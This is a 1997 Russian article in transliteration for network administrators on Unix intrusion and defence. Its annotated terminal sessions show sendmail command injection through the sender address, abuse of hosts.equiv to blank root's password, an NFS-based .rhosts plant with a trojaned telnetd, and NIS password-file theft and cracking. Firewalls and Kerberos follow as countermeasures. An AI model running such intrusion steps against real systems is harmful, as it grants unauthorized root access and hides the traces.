S. Linde,
RNC "Kurchatovskij Institut", lsu@kiae.su ---------------------------------------------------------------Povyshenie interesa k TCP/IP setyam obuslovleno burnym rostom seti Internet. Odnako eto zastavlyaet zadumat'sya nad tem, kak zashchitit' svoi informacionnye resursy i komp'yutery ot razlichnogo roda zloumyshlennikov. Dlya togo, chtoby razrabotat' real'no dejstvuyushchie kontrmery, neobhodimo znat' sposoby i metody vzlomshchikov. V mirovom soobshchestve Internet uzhe davno vedetsya diskussiya o tom publikovat' ili ne publikovat' materialy o metodah proniknoveniya v chuzhie komp'yuternye seti. Posle zharkih obsuzhdenij, pohozhe, byla osoznana neobhodimost' polnoj otkrytosti po etomu voprosu. Stat'ya osnovana na opyte administrirovaniya seti pri postoyannyh popytkah vzloma i metodicheskih ukazaniyah CERT.
Zadacha dannoj stat'i sostoit v tom, chtoby obratit' vnimanie administratorov setej, podklyuchennyh k Internet, na ochevidnye breshi v sisteme bezopasnosti naibolee populyarnyh sistem. Krome primerov vzlomov i vozmozhnyh "dyr", postaraemsya kratko opisat' osnovnye sredstva bor'by s etim neizbezhnym zlom. Uchityvaya tot fakt, chto bol'shinstvo serverov na seti ispol'zuyut operacionnuyu sistemu Unix, obzor vozmozhnyh proreh v sisteme bezopasnosti imeet smysl nachat' imenno s etoj OS.
Nachat' obzor sleduet s vozmozhnosti vzloma cherez elektronnuyu pochtu. Dlya peresylki elektronnoj pochty po IP na podavlyayushchem bol'shinstve sistem ispol'zuetsya programma sendmail, razrabotannaya v universitete Berkli. Zadumannaya kak chisto sluzhebnaya utilita, eta programma priobrela ogromnuyu populyarnost' i voshla v sostav distributiva mnogih Unix-sistem. Odnako ona soderzhala v sebe ochen' ser'eznuyu oshibku, blagodarya kotoroj lyuboj zhelayushchij imel vozmozhnost' vypolnit' na udalennoj mashine komandy s privilegiyami superpol'zovatelya. Obychno vzlomshchiki pytalis' otpravit' sebe fajl passwd dlya podbora parolej libo pomeshchali svoyu informaciyu v fajly, ispol'zuyushchiesya programmami rlogin, rsh dlya zapuska shell bez zaprosa parolya (Primer 1).
PRIMER 1 |
crack% telnet target.remote.com 25 Connecting to 123.456.654.321. ! soedinyaemsya po portu 25 - eto SMTP 220 sendmail SMI/4.3.5.2 ready ! versiya, kotoraya kak izvestno, soderzhit oshibku. helo xxx 220 Helo xxx, ( crack.edu ) mail from: "|echo crack.edu>/.rhosts"@target.remote.com ! podstavlyaem komandu vmesto obratnogo adresa. 200 Sender ok. rcpt to: nosuchuser ! vvodim zaranee nepravil'nogo adresata 500 nosuchuser: user unknown ! nesmotrya na soobshchenie, prodolzhaem dialog. data 230 Enter mail, end with "." 200 Mail accepted ! vse, mashina vzlomana.... quit crack% su ! A teper' zalezaem tak, chtoby nas ne bylo vidno cherez who # rsh target.remote.com /bin/csh -i Welcome to remote.com! Warning! No access to terminal, job control disabled! target# |
|ta oshibka prisutstvuet v neskol'kih desyatkah razlichnyh variantov OS Unix samyh raznyh firm. Krome togo, sushchestvuyut i bolee prostye sposoby pri blagopriyatnyh usloviyah: udalennaya mashina Sun, sistema SunOS 4, NIS ne zapushchen, sistema postavlena, i nichego ne ispravlyalos' (Primer 2).
PRIMER 2 |
crack# su - bin $ rsh target.remote.com /bin/csh -i ! V fajle /etc/hosts.equiv est' zapis' "+" i oshibka... Welcome to remote.com! ! Katalog /etc s vladel'cem bin... Warning! No access to terminal, job control disabled! % ls -ldg /etc drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/ % cd /etc ! Delaem passwd dostupnym na zapis' nam... % mv passwd passwd.was % cp passwd.was passwd ! Redaktiruem % ed passwd 2341 1p root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh s/Nkkh&5gkljGyj//p root::0:0:Root:/:/bin/csh w 2341 q ! I v superpol'zovatelya. %echo /bin/csh -i | su root Warning! No access to terminal, job control disabled! target# mv /etc/passwd.was /etc/passwd ! CHtoby nikto ne obnaruzhil, chto my delali. |
Krome elektronnoj pochty v TCP/IP setyah ochen' shiroko primenyayutsya razlichnye vidy raspredelennyh fajlovyh sistem, samoj populyarnoj iz kotoryh yavlyaetsya Network File System (NFS).
V sluchae neakkuratnogo zapolneniya fajla /etc/exports ili ispol'zovaniya distributiva s oshibkoj (SunOS 4.1) mozhet vozniknut' sleduyushchaya situaciya (Primer 3).
PRIMER 3 |
crack% showmount -e target.remote.com Export list for target.remote.com /home Everyone /disk3 neptun pluton alpha ! Domashnie katalogi dostupny po NFS crack% su # mount -t nfs target.remote.com:/home /mnt # cd /mnt ! Montiruem katalog k nam # ls -ldg * drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/ # echo crack.edu > user/.rhosts ! Ustanavlivaem .rhosts u pol'zovatelya # cat >> /etc/passwd user::257:20::/: ^D ! Sozdaem takogo zhe u nas # su - user ! Stanovimsya im $ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! I zahodim na udalennuyu mashinu % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! Katalog dostupen na zapis' drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! Nashli programmu, kotoraya zapustitsya !pod root"om iz nashego kataloga % cd /usr/etc % mv in.telnetd in.telnetd1 ! sozdaem troyanskogo konya % cat > in.telnetd #!/bin/sh exec /bin/csh -i ^D % chmod 755 in.telnetd ! i zapuskaem ego % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! # chown user /etc; ! Delaem /etc svoim ^M: command not found # exit; ^M: command not found Connection closed by foreign host. % cd /etc ! i dalee kak ran'she kak v primere 1. ....... |
Esli na mashine rabotaet NIS-server i ne prinyato dopolnitel'nyh mer, to s pomoshch'yu special'noj programmy mozhno "utashchit'" po seti fajl passwd, obshchij dlya nekotorogo chisla mashin. V sluchae nesoblyudeniya pravil pri sozdanii parolej, est' dovol'no prilichnaya veroyatnost', chto programma crack podberet neskol'ko. Dal'nejshie sobytiya mogut razvorachivat'sya po odnomu iz scenariev dlya polucheniya polnomochij superpol'zovatelya (Primer 4) (posle togo, kak vy zashli na udalennuyu mashinu kak pol'zovatel').
PRIMER 4 |
! proveryaem na NIS server crack% rpcinfo -p target.remote.com | grep bind 120000 2 udp 2493 ypbind ! est' takoj... crack% ypx -o target.passwd -g target.remote.com ! zabiraem fajl parolej crack% crack target.passwd ! i zapuskaem podborshchik parolej [ a lot of time ] OK, user "user" has password "iamuser" ! nashli, zahodim crack% telnet target.remote.com ! dalee kak v predydushchem primere. ..... |
Estestvenno, chto esli izvestny sposoby preodoleniya zashchity, to dolzhny byt' razrabotany i sredstva zashchity. Dlya minimizacii vozmozhnyh popytok proniknoveniya v set' ochen' effektiven marshrutizator, umeyushchij analizirovat' potok prohodyashchej cherez nego informacii i osushchestvlyayushchij fil'traciyu paketov. |ta vozmozhnost' realizovana prakticheski vo vseh apparatnyh marshrutizatorah (cisco, wellfleet...) i v vide special'nogo PO dlya Unix-mashin (Sun, DEC, BSDI, FreeBSD). Takie marshrutizatory pozvolyayut osushchestvlyat' rabotu v seti strogo po opredelennym pravilam. Naprimer, ne propuskat' iz/v lokal'nuyu set' nekotorye protokoly. Ochen' rekomenduetsya zapreshchat' rlogin, rsh, RPC (sm. Primery), a takzhe pakety, napravlennye na porty 2048 i 2049, - eto porty dannyh dlya NFS. Takzhe rekomenduetsya chetko opredelit' mashiny, prinimayushchie pochtu, i otkryt' port 25 tol'ko dlya nih. Pri neobhodimosti vozmozhna konfiguraciya, kotoraya voobshche zapreshchaet kakie-libo zahody po seti v lokal'nuyu set', pri etom razreshaya iznutri ispol'zovat' lyubye TCP-servisy global'noj seti. Podobnyj marshrutizator ili kombinaciya iz neskol'kih mashin i fil'truyushchih marshrutizatorov poluchili nazvanie brandmauer (ot angl. firewall - stena ognya). Dlya ustanovleniya polnogo kontrolya za vsemi soedineniyami mozhno ispol'zovat' tak nazyvaemyj "programmnyj brandmauer" (software firewall). On predstavlyaet soboj svoeobraznyj marshrutizator, kotoryj osushchestvlyaet kontrol' za soedineniyami ne na urovne IP-paketov, a na urovne sobstvenno kontroliruemyh protokolov. V etom sluchae rezhim prozrachnoj peresylki paketov vyklyuchen, no vmesto programm, obespechivayushchih rabotu s neobhodimymi protokolami (telnet, ftp...), zapuskayutsya programmy, kotorye transliruyut eti protokoly v set' po druguyu storonu mashiny, obychno sverivshis' po baze dannyh na predmet pravomernosti takogo soedineniya i posle identifikacii pol'zovatelya. Dlya pol'zovatelya takoj brandmauer vyglyadit edinstvennym oknom vo vneshnij mir. Naprimer, esli v seti dlya togo, chtoby zajti po ftp na mashinu arch.kiae.su, vam nado nabrat':
% ftp arch.kiae.su
Connected to arch.kiae.su
Name: (arch.kiae.su: you)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our.workstation.our.company.com
.....
to v sluchae programmnogo brandmauera nado nabirat':
% ftp our-soft-firewall
Name: (our-soft-firewall:user) ftp@arch.kiae.su
Password: XXXXXXX
Connected to arch.kiae.su
Name: (arch.kiae.su: ftp)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our-sort-firewall.our.company.com
.......
Analogichno rabotayut telnet, rlogin, X11 i t.d.
Vse rassmotrennye vyshe primery otnosyatsya k tak nazyvaemym "aktivnym" metodam. Akkuratnoe administrirovanie sistemy legko svodit na net vse rassmotrennye dyrki, no sovershenno bessil'no v sluchae primeneniya "passivnoj" ataki. CHto eto takoe? Samyj rasprostranennyj, prostoj v ispolnenii sposob - analiz informacii, peredavaemoj po kanalam svyazi, preimushchestvenno po seti Ethernet. Osnovan on na svojstve etoj seti, blagodarya kotoromu kazhdyj peredavaemyj paket mozhet byt' proanalizirovan lyuboj mashinoj, podklyuchennoj na etot segment seti. Pri nalichii dostatochno bystroj mashiny s adapterom, razreshayushchim rabotu v rezhime priema vseh paketov, mozhno legko izvlekat' takuyu informaciyu, kak paroli paketov NFS. Esli na etom segmente raspolozheno neskol'ko marshrutizatorov, to v nash fil'tr popadut ne tol'ko paroli nashej seti, no i te, kotorymi obmenivayutsya marshrutizatory. Takim obrazom, za sravnitel'no korotkoe vremya mozhno sobrat' kollekciyu parolej na neskol'kih sotnyah mashin.
Dlya bor'by s takimi metodami v konce 80-h godov byla razrabotana sistema setevoj identifikacii pol'zovatelya pod nazvaniem Kerberos. Osnovnoj cel'yu bylo polnoe isklyuchenie peresylki parolej po seti. Pol'zovatel' vvodit parol' tol'ko odin raz pri registracii v sisteme, posle chego emu vydelyaetsya "bilet" na neskol'ko chasov, kotoryj hranitsya v fajle v zashifrovannom vide. |tot bilet soderzhit informaciyu o pol'zovatele, vremya vydachi, adres mashiny i sluchajno sgenerirovannyj klyuch dlya dal'nejshego obmena identifikacionnoj informaciej. Pervonachal'nym klyuchom sluzhit parol' pol'zovatelya. Bilet, vydannyj pri vhode v sistemu, ispol'zuetsya dlya polucheniya vtorichnyh biletov, po kotorym mozhet byt' predostavlen kakoj-libo setevoj servis. So storony servera ispol'zuetsya analogichnyj mehanizm s toj raznicej, chto v kachestve pol'zovatelya vystupaet programma, obespechivayushchaya zaproshennyj vid uslugi. Takim obrazom, programma pol'zovatelya i programma na servere poluchayut paru sluchajnyh klyuchej, s pomoshch'yu kotoryh oni shifruyut identifikacionnuyu informaciyu, prilagayut k nej kontrol'nye summy i na etoj osnove udostoveryayutsya v tom, chto oni te, kem predstavilis'. Posle etogo programma pol'zovatelya mozhet poluchit' dostup k servisu bez zaprosa parolya. Bez znaniya pervonachal'nyh klyuchej seans ne sostoitsya. Krome togo, poluchennaya para klyuchej mozhet byt' ispol'zovana dlya shifrovaniya vsego seansa raboty po seti. |ta sistema imeet celyj ryad nedostatkov. Vo-pervyh, podrazumevaetsya chetkoe razdelenie mashin na rabochie stancii i servery. V sluchae, esli pol'zovatel' pozhelaet, zajdya na server, s pomoshch'yu telnet zajti na druguyu mashinu, identifikaciya ne srabotaet, tak kak pol'zovatel' imeet pervonachal'nyj bilet tol'ko na toj rabochej stancii, gde on vvodil parol'. Inymi slovami, v Kerberos versii 4 polnomochiya pol'zovatelya ne peredayutsya na drugie mashiny. Krome togo, trebuetsya vydelennaya mashina pod server Kerberos, prichem rabotayushchaya v maksimal'no sekretnyh usloviyah, poskol'ku na nej soderzhitsya baza dannyh, gde soderzhatsya vse paroli pol'zovatelej. Kerberos versii 4 ochen' ogranichenno primenim v seti, gde vozmozhny situacii, kogda v silu ryada obstoyatel'stv server Kerberos nedostupen po seti (nepredvidennye sboi v routinge, uhudshenie ili obryv svyazi i t.d.). CHast' nedostatkov, perechislennyh vyshe, likvidirovana v versii 5, no eta realizaciya zapreshchena k eksportu iz SSHA. Po opisannomu algoritmu rabotayut takzhe sistemy Sphinx ot DEC i NIS+ ot Sun. Otlichayutsya oni primeneniem razlichnyh algoritmov shifrovaniya, drugogo protokola peredachi (RPC vmesto UDP) i sposobov ob®edineniya administrativnyh domenov v ierarhiyu.
Krome rassmotrennyh, sushchestvuyut i drugie, bolee izoshchrennye, sposoby vtorzheniya. Mnogie iz nih mozhno nejtralizovat' prostym "akkuratnym" administrirovaniem. Po statistike bol'shinstvo vzlomov osushchestvlyaetsya iz-za halatnosti administratorov ili personala, ekspluatiruyushchego sistemu. He otkladyvaya v "dolgij yashchik", prover'te perechislennye vyshe sposoby nesankcionirovannogo dostupa - esli udastsya "vzlomat'" vash komp'yuter vam, to eto mogut sdelat' i drugie.
Last-modified: Mon, 05 May 1997 07:36:09 GMT